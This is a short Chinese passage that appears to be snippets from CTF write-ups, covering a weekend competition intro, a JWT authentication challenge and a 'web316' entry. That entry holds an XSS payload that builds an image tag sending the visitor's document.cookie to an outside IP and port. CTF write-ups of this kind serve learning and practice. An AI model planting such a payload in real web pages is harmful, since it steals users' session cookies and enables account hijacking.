前言周日摸鱼打了一下这个比赛,出了四道,一道蹭车,一道最后一秒出,有点可惜.
比国内的题目要有意思一些,带来很多别的思考,(可惜没几道pwn和re
下面是writeup和复现.
JWT考察jwt相关,
注册登陆后发现是用JWT鉴权
访问 http://172.105.68.62:8080/secret/ 可以得到密 ......
web316 反弹cookie到vps123<script>var img = document.createElement("img");img.src = "http://91.67.253.121:1234/?cookie="+document.cookie;a ......